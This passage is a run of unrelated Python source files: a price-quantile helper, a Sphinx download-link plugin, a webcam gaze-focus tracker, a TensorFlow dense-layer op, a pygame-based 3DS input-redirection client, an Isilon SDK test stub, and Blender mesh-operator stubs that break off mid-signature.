sell_data.pop(0.25) sell_data['avg'] = sell_data.pop(0.5) sell_data['third'] = sell_data.pop(0.75) buy = [float(p['buy']) for p in prices] buy_df = pn.DataFrame(np.array(buy)) buy_data = buy_df.quantile([0.25, 0.5, 0.75]).to_dict()[0] buy_data['first'] = buy_data.pop(0.25) buy_data['avg'] = buy_data.pop(0.5) buy_data['third'] = buy_data.pop(0.75) asset.prices_quantiles = { 'buy': buy_data, 'sell': sell_data, } return asset except KeyError: return def get_assets_with_average(self): """ fetches all the available assets with their respective quotes :return asset list: """ assets = self.get_assets() return [self.average_for_asset(a) for a in assets if a]
""" Sphinx is hardcoded to interpret links to downloadable files relative to the root of the docs source tree. However, the downloadable files we want to use (tarballs of our examples directories) are themselves generated at build time, and we would therefore like them to be separate from the source. This module is a Sphinx plugin that replaces the normal interpretation of links, causing Sphinx to look for downloads relative to a different directory (which is set in `conf.py`). """ import logging import os import types from typing import Any, Dict from docutils import nodes from sphinx import addnodes, application from sphinx.environment.collectors import asset from sphinx.locale import __ logger = logging.getLogger(__name__) class DownloadExternalFileCollector(asset.DownloadFileCollector): def process_doc( self: asset.DownloadFileCollector, app: application.Sphinx, doctree: nodes.document ) -> None: """ This function is different from the original method only in doing some surgery on the paths it finds when a separate root directory is configured. """ for node in doctree.traverse(addnodes.download_reference): targetname = node["reftarget"] if "://" in targetname: node["refuri"] = targetname else: rel_filename, filename = app.env.relfn2path(targetname, app.env.docname) if app.config.dai_downloads_root: filename = os.path.abspath( os.path.join(app.config.dai_downloads_root, rel_filename) ) rel_filename = os.path.relpath(filename, app.env.srcdir) app.env.dependencies[app.env.docname].add(rel_filename) if not os.access(filename, os.R_OK): logger.warning(__("download file not readable: %s") % filename) continue node["filename"] = app.env.dlfiles.add_file(app.env.docname, rel_filename) def setup(app: application.Sphinx) -> Dict[str, Any]: app.add_config_value("dai_downloads_root", None, "html") # Disable the old instance of DownloadFileCollector and replace it with ours. for event in app.events.listeners.values(): for listener_id, callback in list(event.items()): if isinstance(callback, types.MethodType) and isinstance( callback.__self__, asset.DownloadFileCollector ): del event[listener_id] app.add_env_collector(DownloadExternalFileCollector) return { "version": "0", "parallel_read_safe": True, "parallel_write_safe": True, }
# Analytics Collector def truncate(n, decimals=0): multiplier = 10 ** decimals return int(n * multiplier) / multiplier def startCam(): import cv2 from gaze_tracking import GazeTracking import time gaze = GazeTracking() webcam = cv2.VideoCapture(0) startTime = time.time() totalFrames = 0 framesDistracted = 0 framesFocused = 0 while True: _, frame = webcam.read() totalFrames += 1 gaze.refresh(frame) frame = gaze.annotated_frame() if gaze.is_blinking(): framesDistracted += 1 elif gaze.is_right(): framesDistracted += 1 elif gaze.is_left(): framesDistracted += 1 elif gaze.is_center(): framesFocused += 1 else: framesDistracted += 1 cv2.imshow("Camera", frame) if cv2.waitKey(1) == ord('q'): break webcam.release() cv2.destroyAllWindows() totalTime = truncate(time.time() - startTime, 2) percentFocused = truncate((framesFocused / totalFrames) * 100, 2) percentDistracted = truncate((framesDistracted / totalFrames) * 100, 2) return totalTime, percentFocused, percentDistracted
# Copyright 2020 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Stateless ops for core Keras layers.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function from tensorflow.python.eager import context from tensorflow.python.framework import sparse_tensor from tensorflow.python.ops import gen_math_ops from tensorflow.python.ops import math_ops from tensorflow.python.ops import nn_ops from tensorflow.python.ops import sparse_ops from tensorflow.python.ops import standard_ops # TODO(b/157913406): Expose this publicly. def dense(inputs, kernel, bias=None, activation=None, dtype=None): """Densely connected NN layer op. Arguments: inputs: `tf.Tensor` or `tf.SparseTensor`. Inputs to operation. kernel: `tf.Variable`. Matrix kernel. bias: (Optional) `tf.Variable`. Bias to add to outputs. activation: (Optional) 1-argument callable. Activation function to apply to outputs. dtype: (Optional) `tf.DType`. Dtype to cast `inputs` to. Returns: `tf.Tensor`. Output of dense connection. """ if dtype: if inputs.dtype.base_dtype != dtype.base_dtype: inputs = math_ops.cast(inputs, dtype=dtype) rank = inputs.shape.rank if rank == 2 or rank is None: if isinstance(inputs, sparse_tensor.SparseTensor): outputs = sparse_ops.sparse_tensor_dense_matmul(inputs, kernel) else: outputs = gen_math_ops.mat_mul(inputs, kernel) # Broadcast kernel to inputs. else: outputs = standard_ops.tensordot(inputs, kernel, [[rank - 1], [0]]) # Reshape the output back to the original ndim of the input. if not context.executing_eagerly(): shape = inputs.shape.as_list() output_shape = shape[:-1] + [kernel.shape[-1]] outputs.set_shape(output_shape) if bias is not None: outputs = nn_ops.bias_add(outputs, bias) if activation is not None: outputs = activation(outputs) return outputs
#!/usr/bin/env python3 from tpp.tppflush import * import sys from math import fabs try: import pygame except ImportError: exit("Pygame required. Exiting.") try: from lib.controller import * except ImportError: joystick_name="??" j_axis=[ ] #buttons.py adds the following: #joystick_name="Microsoft X-Box 360 pad" #buttons=['B', 'A', 'Y', 'X', 'L', 'R', 'SELECT', 'START', 'Home', 'Home', 'Home'] #j_axis=[0, 1, 3, 4] done=False circx,circy = 160,120 deadZone=0.3 #send '0' if fabs joystick(0,1) is less than this value eg joystick_x=0.1, sends joystick_x=0.0 #Default button mapping buttonMappings = [ HIDButtons.A, HIDButtons.B, HIDButtons.X, HIDButtons.Y, HIDButtons.SELECT, #Z HIDButtons.R, HIDButtons.L, HIDButtons.START, HIDButtons.DPADUP, HIDButtons.DPADDOWN, HIDButtons.DPADLEFT, HIDButtons.DPADRIGHT ] class KBDButtons(int): HOME = pygame.K_HOME POWER = pygame.K_END #street fighter style layout on numberpad ([punches] y,x,L -> 4,5,6) #might be useful for joy2key apps KBbutt={ 257: HIDButtons.B, #numberpad 1 258: HIDButtons.A, 259: HIDButtons.R, 260: HIDButtons.Y, #numberpad 4 261: HIDButtons.X, 262: HIDButtons.L, 256: HIDButtons.START, #numberpad 0 266: HIDButtons.SELECT, #numberpad . 273: HIDButtons.DPADUP, #arrow key up 274: HIDButtons.DPADDOWN, 276: HIDButtons.DPADLEFT, 275: HIDButtons.DPADRIGHT } if len(sys.argv) < 2: #this is the pop up window import tkinter as tk class App: def __init__(self, master): frame=tk.Frame(master) frame.pack() #reads file lastIP to get first line try: f=open("lastIP","r") last_ip=f.readline() f.close() except FileNotFoundError: last_ip=" " self.l_IP=tk.StringVar() self.l_IP.set(last_ip) #image banner (row 0, col 0) lumaIMG = tk.PhotoImage(file="lib/luma.png") lumal = tk.Label(frame,image=lumaIMG) lumal.image = lumaIMG lumal.grid(row=0,columnspan=3) #places the 3 other elements (label, text box, button) on row 1 tk.Label(frame, text='IP:',font=("Courier", 22)).grid(row=1, column=0, sticky=tk.E) tk.Entry(frame,bg='white', width=15, textvariable=self.l_IP, font=("Courier", 18)).grid(row=1,column=1, pady=10, sticky=tk.E+tk.W) button = tk.Button(frame, text='Go', font=("Courier", 18), command=self.store) button.grid(row=1, column=2, sticky=tk.W, pady=10) #center label and butt frame.grid_columnconfigure(0, weight=1) frame.grid_columnconfigure(2, weight=1) master.bind('<Return>', self.store ) #"enter" key master.bind('<KP_Enter>', self.store ) # numeric "enter" key def store(self, *args): global IP IP=self.l_IP.get() f=open("lastIP","w") f.write(IP.strip()) #stores data in text box (as string type) f.close() root.quit() root= tk.Tk() root.wm_title('3DS IP') App(root) root.bind('<Escape>', lambda x: quit()) root.mainloop() root.destroy() #removes window server = IP.strip() else: server = sys.argv[1] server=LumaInputServer(server) pygame.init() screen = pygame.display.set_mode((320, 240)) pygame.display.set_caption('touchscreen') botSr = pygame.image.load('lib/bottom.png') screen.blit(botSr, (0,0)) if len(j_axis)>=6 : pygame.draw.circle(screen, (0,0,0), (circx, circy), 5, 2) pygame.display.update() pygame.joystick.init() joystick_count = pygame.joystick.get_count() print("Number of joysticks: {}".format(joystick_count) ) if (joystick_count>0): #Only loads one joystick if multiple are connected. for i in range(joystick_count): joystick = pygame.joystick.Joystick(i) name = joystick.get_name() if name == joystick_name: break joystick.init() print("Using joystick \"{}\"".format(name)) if name == joystick_name: buttonMappings=buttons print("\t--> loading \"{}\" layout".format(joystick_name)) else : print("\t(using default button layout)") print("\t{} axes, {} buttons, {} hats".format(joystick.get_numaxes(),joystick.get_numbuttons(),joystick.get_numhats())) for i in range(joystick.get_numaxes()): j_axis.append(i) else: print("No controller found!\n\t(restricted to limited keyboard button layout)") print("\nHOME = HOME key \nPOWER = END key\nEnd Program = ESC key") while done==False: #Event L O O P for event in pygame.event.get(): # User did something if event.type == pygame.QUIT: # If user clicked close done=True #Touchscreen input if pygame.mouse.get_pressed()[0]: pos = pygame.mouse.get_pos() server.touch(pos[0], pos[1]) #print("THSC: ",pos[0],",",pos[1]) server.send() elif event.type == pygame.MOUSEBUTTONUP: server.clear_touch() server.send() #Keyboard Mappings elif event.type == pygame.KEYDOWN: if event.key == KBDButtons.HOME: #home server.special_press(Special_Buttons.HOME) #print("HOME") if event.key == KBDButtons.POWER: #power server.special_press(Special_Buttons.POWER) #print("POWER") if event.key == pygame.K_ESCAPE: #end program server.clear_everything() done = True if event.key in KBbutt: server.hid_press(KBbutt[event.key]) #print(event.key) server.send() elif event.type == pygame.KEYUP: if event.key == KBDButtons.HOME: #home server.special_unpress(Special_Buttons.HOME) if event.key == KBDButtons.POWER: #power server.special_unpress(Special_Buttons.POWER) if event.key in KBbutt: server.hid_unpress(KBbutt[event.key]) server.send() # Possible joystick actions: JOYAXISMOTION JOYBALLMOTION JOYBUTTONDOWN JOYBUTTONUP JOYHATMOTION if event.type == pygame.JOYBUTTONDOWN : #print("Joystick {} button {} pressed.".format(event.joy,event.button)) server.press(buttonMappings[event.button]) server.send() if event.type == pygame.JOYBUTTONUP: #print("Joystick {} button {} released.".format(event.joy,event.button)) server.unpress(buttonMappings[event.button]) server.send() if event.type == pygame.JOYHATMOTION: #print("Joystick {} HATS moved to {}.".format(event.joy, event.value)) (xhat, yhat) = event.value #[-1,0,1] if (xhat == 1): server.press(HIDButtons.DPADRIGHT) elif (xhat == -1): server.press(HIDButtons.DPADLEFT) elif (xhat == 0) : server.unpress(HIDButtons.DPADRIGHT) server.send() server.unpress(HIDButtons.DPADLEFT) if (yhat == 1): server.press(HIDButtons.DPADUP) elif (yhat == -1): server.press(HIDButtons.DPADDOWN) elif (yhat == 0) : server.unpress(HIDButtons.DPADDOWN) server.send() server.unpress(HIDButtons.DPADUP) server.send() if event.type == pygame.JOYAXISMOTION: #xbox:Left Thumbstick | axis 0 : L/R | axis 1 : U/D #xbox: axis 2 : L trigger (-1:1) #xbox: Right Thumbstick | axis 3 : L/R | axis 4 : U/D #xbox: axis 5 : R trigger (-1:1) #if event.axis == 0: print("Joystick {} axis {} moved to {}.".format(event.joy,event.axis, event.value)) if event.axis == j_axis[0] : if fabs(event.value)>deadZone: server.circle_pad_coords[0] = int(32767*event.value) #left_joy_x else: #note: circle_pad_neutral() == circle_pad_coords = [0,0] (that is both X and Y coords are set to zero) server.circle_pad_coords[0] = int(0) #left_joy_x server.send() if event.axis==j_axis[1] : if fabs(event.value)>deadZone: server.circle_pad_coords[1] = int(-32767*event.value) #left_joy_y else: server.circle_pad_coords[1] = int(0) #left_joy_y server.send() #using the right trigger to touch the screen only works if you have a right trigger and right thumbstick if len(j_axis)>=6: if (event.axis in [j_axis[2], j_axis[3],j_axis[5]]): #r trig = mouse click (circx, circy)=(160+int(159*joystick.get_axis(j_axis[2])),120+int(119*joystick.get_axis(j_axis[3]))) #draw location of touch point but only when joystick moves screen.blit(botSr, (0,0)) pygame.draw.circle(screen, (0,0,0), (circx, circy), 5, 2) pygame.display.update() if (joystick.get_axis(j_axis[5])>0.0): #Want to be able to "drag" server.touch(circx,circy) server.send() pygame.draw.circle(screen, (255,255,255), (circx, circy), 3, 0) pygame.display.update() if event.axis == j_axis[5]: #r trig if event.value < 0: #less than half depression #notme_irl server.clear_touch() server.send() print("\nClearing everything and closing program") server.clear_everything() pygame.quit()
# coding: utf-8 """ Isilon SDK Isilon SDK - Language bindings for the OneFS API # noqa: E501 OpenAPI spec version: 4 Contact: [email protected] Generated by: https://github.com/swagger-api/swagger-codegen.git """ from __future__ import absolute_import import unittest import isi_sdk_8_0_1 from isi_sdk_8_0_1.models.drives_drive_firmware_node_drive import DrivesDriveFirmwareNodeDrive # noqa: E501 from isi_sdk_8_0_1.rest import ApiException class TestDrivesDriveFirmwareNodeDrive(unittest.TestCase): """DrivesDriveFirmwareNodeDrive unit test stubs""" def setUp(self): pass def tearDown(self): pass def testDrivesDriveFirmwareNodeDrive(self): """Test DrivesDriveFirmwareNodeDrive""" # FIXME: construct object with mandatory attributes with example values # model = isi_sdk_8_0_1.models.drives_drive_firmware_node_drive.DrivesDriveFirmwareNodeDrive() # noqa: E501 pass if __name__ == '__main__': unittest.main()
import sys import typing def average_normals(average_type: typing.Union[int, str] = 'CUSTOM_NORMAL', weight: int = 50, threshold: float = 0.01): '''Average custom normals of selected vertices :param average_type: Type, Averaging methodCUSTOM_NORMAL Custom Normal, Take Average of vert Normals.FACE_AREA Face Area, Set all vert normals by Face Area.CORNER_ANGLE Corner Angle, Set all vert normals by Corner Angle. :type average_type: typing.Union[int, str] :param weight: Weight, Weight applied per face :type weight: int :param threshold: Threshold, Threshold value for different weights to be considered equal :type threshold: float ''' pass def beautify_fill(angle_limit: float = 3.14159): '''Rearrange some faces to try to get less degenerated geometry :param angle_limit: Max Angle, Angle limit :type angle_limit: float ''' pass def bevel(offset_type: typing.Union[int, str] = 'OFFSET', offset: float = 0.0, offset_pct: float = 0.0, segments: int = 1, profile: float = 0.5, vertex_only: bool = False, clamp_overlap: bool = False, loop_slide: bool = True, mark_seam: bool = False, mark_sharp: bool = False, material: int = -1, harden_normals: bool = False, face_strength_mode: typing.Union[int, str] = 'NONE', miter_outer: typing.Union[int, str] = 'SHARP', miter_inner: typing.Union[int, str] = 'SHARP', spread: float = 0.1, release_confirm: bool = False): '''Cut into selected items at an angle to create flat or rounded bevel or chamfer :param offset_type: Width Type, What distance Width measuresOFFSET Offset, Amount is offset of new edges from original.WIDTH Width, Amount is width of new face.DEPTH Depth, Amount is perpendicular distance from original edge to bevel face.PERCENT Percent, Amount is percent of adjacent edge length. :type offset_type: typing.Union[int, str] :param offset: Width, Bevel amount :type offset: float :param offset_pct: Width Percent, Bevel amount for percentage method :type offset_pct: float :param segments: Segments, Segments for curved edge :type segments: int :param profile: Profile, Controls profile shape (0.5 = round) :type profile: float :param vertex_only: Vertex Only, Bevel only vertices :type vertex_only: bool :param clamp_overlap: Clamp Overlap, Do not allow beveled edges/vertices to overlap each other :type clamp_overlap: bool :param loop_slide: Loop Slide, Prefer slide along edge to even widths :type loop_slide: bool :param mark_seam: Mark Seams, Mark Seams along beveled edges :type mark_seam: bool :param mark_sharp: Mark Sharp, Mark beveled edges as sharp :type mark_sharp: bool :param material: Material, Material for bevel faces (-1 means use adjacent faces) :type material: int :param harden_normals: Harden Normals, Match normals of new faces to adjacent faces :type harden_normals: bool :param face_strength_mode: Face Strength Mode, Whether to set face strength, and which faces to set face strength onNONE None, Do not set face strength.NEW New, Set face strength on new faces only.AFFECTED Affected, Set face strength on new and modified faces only.ALL All, Set face strength on all faces. :type face_strength_mode: typing.Union[int, str] :param miter_outer: Outer Miter, Pattern to use for outside of mitersSHARP Sharp, Outside of miter is sharp.PATCH Patch, Outside of miter is squared-off patch.ARC Arc, Outside of miter is arc. :type miter_outer: typing.Union[int, str] :param miter_inner: Inner Miter, Pattern to use for inside of mitersSHARP Sharp, Inside of miter is sharp.ARC Arc, Inside of miter is arc. :type miter_inner: typing.Union[int, str] :param spread: Spread, Amount to spread arcs for arc inner miters :type spread: float :param release_confirm: Confirm on Release :type release_confirm: bool ''' pass def bisect(plane_co: float = (0.0, 0.0, 0.0), plane_no: float = (0.0, 0.0, 0.0), use_fill: bool = False, clear_inner: bool = False, clear_outer: bool = False, threshold: float = 0.0001, xstart: int = 0, xend: int = 0, ystart: int = 0, yend: int = 0, cursor: int = 5): '''Cut geometry along a plane (click-drag to define plane) :param plane_co: Plane Point, A point on the plane :type plane_co: float :param plane_no: Plane Normal, The direction the plane points :type plane_no: float :param use_fill: Fill, Fill in the cut :type use_fill: bool :param clear_inner: Clear Inner, Remove geometry behind the plane :type clear_inner: bool :param clear_outer: Clear Outer, Remove geometry in front of the plane :type clear_outer: bool :param threshold: Axis Threshold, Preserves the existing geometry along the cut plane :type threshold: float :param xstart: X Start :type xstart: int :param xend: X End :type xend: int :param ystart: Y Start :type ystart: int :param yend: Y End :type yend: int :param cursor: Cursor, Mouse cursor style to use during the modal operator :type cursor: int ''' pass def blend_from_shape(shape: typing.Union[int, str] = '', blend: float = 1.0, add: bool = True): '''Blend in shape from a shape key :param shape: Shape, Shape key to use for blending :type shape: typing.Union[int, str] :param blend: Blend, Blending factor :type blend: float :param add: Add, Add rather than blend between shapes :type add: bool ''' pass def bridge_edge_loops(type: typing.Union[int, str] = 'SINGLE', use_merge: bool = False, merge_factor: float = 0.5, twist_offset: int = 0, number_cuts: int = 0, interpolation: typing.Union[int, str] = 'PATH', smoothness: float = 1.0, profile_shape_factor: float = 0.0, profile_shape: typing.Union[int, str] = 'SMOOTH'): '''Create a bridge of faces between two or more selected edge loops :param type: Connect Loops, Method of bridging multiple loops :type type: typing.Union[int, str] :param use_merge: Merge, Merge rather than creating faces :type use_merge: bool :param merge_factor: Merge Factor :type merge_factor: float :param twist_offset: Twist, Twist offset for closed loops :type twist_offset: int :param number_cuts: Number of Cuts :type number_cuts: int :param interpolation: Interpolation, Interpolation method :type interpolation: typing.Union[int, str] :param smoothness: Smoothness, Smoothness factor :type smoothness: float :param profile_shape_factor: Profile Factor, How much intermediary new edges are shrunk/expanded :type profile_shape_factor: float :param profile_shape: Profile Shape, Shape of the profileSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff. :type profile_shape: typing.Union[int, str] ''' pass def colors_reverse(): '''Flip direction of vertex colors inside faces ''' pass def colors_rotate(use_ccw: bool = False): '''Rotate vertex colors inside faces :param use_ccw: Counter Clockwise :type use_ccw: bool ''' pass def convex_hull(delete_unused: bool = True, use_existing_faces: bool = True, make_holes: bool = False, join_triangles: bool = True, face_threshold: float = 0.698132, shape_threshold: float = 0.698132, uvs: bool = False, vcols: bool = False, seam: bool = False, sharp: bool = False, materials: bool = False): '''Enclose selected vertices in a convex polyhedron :param delete_unused: Delete Unused, Delete selected elements that are not used by the hull :type delete_unused: bool :param use_existing_faces: Use Existing Faces, Skip hull triangles that are covered by a pre-existing face :type use_existing_faces: bool :param make_holes: Make Holes, Delete selected faces that are used by the hull :type make_holes: bool :param join_triangles: Join Triangles, Merge adjacent triangles into quads :type join_triangles: bool :param face_threshold: Max Face Angle, Face angle limit :type face_threshold: float :param shape_threshold: Max Shape Angle, Shape angle limit :type shape_threshold: float :param uvs: Compare UVs :type uvs: bool :param vcols: Compare VCols :type vcols: bool :param seam: Compare Seam :type seam: bool :param sharp: Compare Sharp :type sharp: bool :param materials: Compare Materials :type materials: bool ''' pass def customdata_custom_splitnormals_add(): '''Add a custom split normals layer, if none exists yet ''' pass def customdata_custom_splitnormals_clear(): '''Remove the custom split normals layer, if it exists ''' pass def customdata_mask_clear(): '''Clear vertex sculpt masking data from the mesh ''' pass def customdata_skin_add(): '''Add a vertex skin layer ''' pass def customdata_skin_clear(): '''Clear vertex skin layer ''' pass def decimate(ratio: float = 1.0, use_vertex_group: bool = False, vertex_group_factor: float = 1.0, invert_vertex_group: bool = False, use_symmetry: bool = False, symmetry_axis: typing.Union[int, str] = 'Y'): '''Simplify geometry by collapsing edges :param ratio: Ratio :type ratio: float :param use_vertex_group: Vertex Group, Use active vertex group as an influence :type use_vertex_group: bool :param vertex_group_factor: Weight, Vertex group strength :type vertex_group_factor: float :param invert_vertex_group: Invert, Invert vertex group influence :type invert_vertex_group: bool :param use_symmetry: Symmetry, Maintain symmetry on an axis :type use_symmetry: bool :param symmetry_axis: Axis, Axis of symmetry :type symmetry_axis: typing.Union[int, str] ''' pass def delete(type: typing.Union[int, str] = 'VERT'): '''Delete selected vertices, edges or faces :param type: Type, Method used for deleting mesh data :type type: typing.Union[int, str] ''' pass def delete_edgeloop(use_face_split: bool = True): '''Delete an edge loop by merging the faces on each side :param use_face_split: Face Split, Split off face corners to maintain surrounding geometry :type use_face_split: bool ''' pass def delete_loose(use_verts: bool = True, use_edges: bool = True, use_faces: bool = False): '''Delete loose vertices, edges or faces :param use_verts: Vertices, Remove loose vertices :type use_verts: bool :param use_edges: Edges, Remove loose edges :type use_edges: bool :param use_faces: Faces, Remove loose faces :type use_faces: bool ''' pass def dissolve_degenerate(threshold: float = 0.0001): '''Dissolve zero area faces and zero length edges :param threshold: Merge Distance, Maximum distance between elements to merge :type threshold: float ''' pass def dissolve_edges(use_verts: bool = True, use_face_split: bool = False): '''Dissolve edges, merging faces :param use_verts: Dissolve Verts, Dissolve remaining vertices :type use_verts: bool :param use_face_split: Face Split, Split off face corners to maintain surrounding geometry :type use_face_split: bool ''' pass def dissolve_faces(use_verts: bool = False): '''Dissolve faces :param use_verts: Dissolve Verts, Dissolve remaining vertices :type use_verts: bool ''' pass def dissolve_limited(angle_limit: float = 0.0872665, use_dissolve_boundaries: bool = False, delimit: typing.Set[typing.Union[int, str]] = {'NORMAL'}): '''Dissolve selected edges and verts, limited by the angle of surrounding geometry :param angle_limit: Max Angle, Angle limit :type angle_limit: float :param use_dissolve_boundaries: All Boundaries, Dissolve all vertices in between face boundaries :type use_dissolve_boundaries: bool :param delimit: Delimit, Delimit dissolve operationNORMAL Normal, Delimit by face directions.MATERIAL Material, Delimit by face material.SEAM Seam, Delimit by edge seams.SHARP Sharp, Delimit by sharp edges.UV UVs, Delimit by UV coordinates. :type delimit: typing.Set[typing.Union[int, str]] ''' pass def dissolve_mode(use_verts: bool = False, use_face_split: bool = False, use_boundary_tear: bool = False): '''Dissolve geometry based on the selection mode :param use_verts: Dissolve Verts, Dissolve remaining vertices :type use_verts: bool :param use_face_split: Face Split, Split off face corners to maintain surrounding geometry :type use_face_split: bool :param use_boundary_tear: Tear Boundary, Split off face corners instead of merging faces :type use_boundary_tear: bool ''' pass def dissolve_verts(use_face_split: bool = False, use_boundary_tear: bool = False): '''Dissolve verts, merge edges and faces :param use_face_split: Face Split, Split off face corners to maintain surrounding geometry :type use_face_split: bool :param use_boundary_tear: Tear Boundary, Split off face corners instead of merging faces :type use_boundary_tear: bool ''' pass def dupli_extrude_cursor(rotate_source: bool = True): '''Duplicate and extrude selected vertices, edges or faces towards the mouse cursor :param rotate_source: Rotate Source, Rotate initial selection giving better shape :type rotate_source: bool ''' pass def duplicate(mode: int = 1): '''Duplicate selected vertices, edges or faces :param mode: Mode :type mode: int ''' pass def duplicate_move(MESH_OT_duplicate=None, TRANSFORM_OT_translate=None): '''Duplicate mesh and move :param MESH_OT_duplicate: Duplicate, Duplicate selected vertices, edges or faces :param TRANSFORM_OT_translate: Move, Move selected items ''' pass def edge_collapse(): '''Collapse selected edges ''' pass def edge_face_add(): '''Add an edge or face to selected ''' pass def edge_rotate(use_ccw: bool = False): '''Rotate selected edge or adjoining faces :param use_ccw: Counter Clockwise :type use_ccw: bool ''' pass def edge_split(): '''Split selected edges so that each neighbor face gets its own copy ''' pass def edgering_select(extend: bool = False, deselect: bool = False, toggle: bool = False, ring: bool = True): '''Select an edge ring :param extend: Extend, Extend the selection :type extend: bool :param deselect: Deselect, Remove from the selection :type deselect: bool :param toggle: Toggle Select, Toggle the selection :type toggle: bool :param ring: Select Ring, Select ring :type ring: bool ''' pass def edges_select_sharp(sharpness: float = 0.523599): '''Select all sharp-enough edges :param sharpness: Sharpness :type sharpness: float ''' pass def extrude_context(use_normal_flip: bool = False, mirror: bool = False): '''Extrude selection :param use_normal_flip: Flip Normals :type use_normal_flip: bool :param mirror: Mirror Editing :type mirror: bool ''' pass def extrude_context_move(MESH_OT_extrude_context=None, TRANSFORM_OT_translate=None): '''Extrude region together along the average normal :param MESH_OT_extrude_context: Extrude Context, Extrude selection :param TRANSFORM_OT_translate: Move, Move selected items ''' pass def extrude_edges_indiv(use_normal_flip: bool = False, mirror: bool = False): '''Extrude individual edges only :param use_normal_flip: Flip Normals :type use_normal_flip: bool :param mirror: Mirror Editing :type mirror: bool ''' pass def extrude_edges_move(MESH_OT_extrude_edges_indiv=None, TRANSFORM_OT_translate=None): '''Extrude edges and move result :param MESH_OT_extrude_edges_indiv: Extrude Only Edges, Extrude individual edges only :param TRANSFORM_OT_translate: Move, Move selected items ''' pass def extrude_faces_indiv(mirror: bool = False): '''Extrude individual faces only :param mirror: Mirror Editing :type mirror: bool ''' pass def extrude_faces_move(MESH_OT_extrude_faces_indiv=None, TRANSFORM_OT_shrink_fatten=None): '''Extrude each individual face separately along local normals :param MESH_OT_extrude_faces_indiv: Extrude Individual Faces, Extrude individual faces only :param TRANSFORM_OT_shrink_fatten: Shrink/Fatten, Shrink/fatten selected vertices along normals ''' pass def extrude_region(use_normal_flip: bool = False, mirror: bool = False): '''Extrude region of faces :param use_normal_flip: Flip Normals :type use_normal_flip: bool :param mirror: Mirror Editing :type mirror: bool ''' pass def extrude_region_move(MESH_OT_extrude_region=None, TRANSFORM_OT_translate=None): '''Extrude region and move result :param MESH_OT_extrude_region: Extrude Region, Extrude region of faces :param TRANSFORM_OT_translate: Move, Move selected items ''' pass def extrude_region_shrink_fatten(MESH_OT_extrude_region=None, TRANSFORM_OT_shrink_fatten=None): '''Extrude region together along local normals :param MESH_OT_extrude_region: Extrude Region, Extrude region of faces :param TRANSFORM_OT_shrink_fatten: Shrink/Fatten, Shrink/fatten selected vertices along normals ''' pass def extrude_repeat(offset: float = 2.0, steps: int = 10): '''Extrude selected vertices, edges or faces repeatedly :param offset: Offset :type offset: float :param steps: Steps :type steps: int ''' pass def extrude_vertices_move(MESH_OT_extrude_verts_indiv=None, TRANSFORM_OT_translate=None): '''Extrude vertices and move result :param MESH_OT_extrude_verts_indiv: Extrude Only Vertices, Extrude individual vertices only :param TRANSFORM_OT_translate: Move, Move selected items ''' pass def extrude_verts_indiv(mirror: bool = False): '''Extrude individual vertices only :param mirror: Mirror Editing :type mirror: bool ''' pass def face_make_planar(factor: float = 1.0, repeat: int = 1): '''Flatten selected faces :param factor: Factor :type factor: float :param repeat: Iterations :type repeat: int ''' pass def face_split_by_edges(): '''Weld loose edges into faces (splitting them into new faces) ''' pass def faces_mirror_uv(direction: typing.Union[int, str] = 'POSITIVE', precision: int = 3): '''Copy mirror UV coordinates on the X axis based on a mirrored mesh :param direction: Axis Direction :type direction: typing.Union[int, str] :param precision: Precision, Tolerance for finding vertex duplicates :type precision: int ''' pass def faces_select_linked_flat(sharpness: float = 0.0174533): '''Select linked faces by angle :param sharpness: Sharpness :type sharpness: float ''' pass def faces_shade_flat(): '''Display faces flat ''' pass def faces_shade_smooth(): '''Display faces smooth (using vertex normals) ''' pass def fill(use_beauty: bool = True): '''Fill a selected edge loop with faces :param use_beauty: Beauty, Use best triangulation division :type use_beauty: bool ''' pass def fill_grid(span: int = 1, offset: int = 0, use_interp_simple: bool = False): '''Fill grid from two loops :param span: Span, Number of grid columns :type span: int :param offset: Offset, Vertex that is the corner of the grid :type offset: int :param use_interp_simple: Simple Blending, Use simple interpolation of grid vertices :type use_interp_simple: bool ''' pass def fill_holes(sides: int = 4): '''Fill in holes (boundary edge loops) :param sides: Sides, Number of sides in hole required to fill (zero fills all holes) :type sides: int ''' pass def flip_normals(): '''Flip the direction of selected faces’ normals (and of their vertices) ''' pass def hide(unselected: bool = False): '''Hide (un)selected vertices, edges or faces :param unselected: Unselected, Hide unselected rather than selected :type unselected: bool ''' pass def inset(use_boundary: bool = True, use_even_offset: bool = True, use_relative_offset: bool = False, use_edge_rail: bool = False, thickness: float = 0.0, depth: float = 0.0, use_outset: bool = False, use_select_inset: bool = False, use_individual: bool = False, use_interpolate: bool = True, release_confirm: bool = False): '''Inset new faces into selected faces :param use_boundary: Boundary, Inset face boundaries :type use_boundary: bool :param use_even_offset: Offset Even, Scale the offset to give more even thickness :type use_even_offset: bool :param use_relative_offset: Offset Relative, Scale the offset by surrounding geometry :type use_relative_offset: bool :param use_edge_rail: Edge Rail, Inset the region along existing edges :type use_edge_rail: bool :param thickness: Thickness :type thickness: float :param depth: Depth :type depth: float :param use_outset: Outset, Outset rather than inset :type use_outset: bool :param use_select_inset: Select Outer, Select the new inset faces :type use_select_inset: bool :param use_individual: Individual, Individual Face Inset :type use_individual: bool :param use_interpolate: Interpolate, Blend face data across the inset :type use_interpolate: bool :param release_confirm: Confirm on Release :type release_confirm: bool ''' pass def intersect(mode: typing.Union[int, str] = 'SELECT_UNSELECT', separate_mode: typing.Union[int, str] = 'CUT', threshold: float = 1e-06): '''Cut an intersection into faces :param mode: SourceSELECT Self Intersect, Self intersect selected faces.SELECT_UNSELECT Selected/Unselected, Intersect selected with unselected faces. :type mode: typing.Union[int, str] :param separate_mode: Separate ModeALL All, Separate all geometry from intersections.CUT Cut, Cut into geometry keeping each side separate (Selected/Unselected only).NONE Merge, Merge all geometry from the intersection. :type separate_mode: typing.Union[int, str] :param threshold: Merge threshold :type threshold: float ''' pass def intersect_boolean(operation: typing.Union[int, str] = 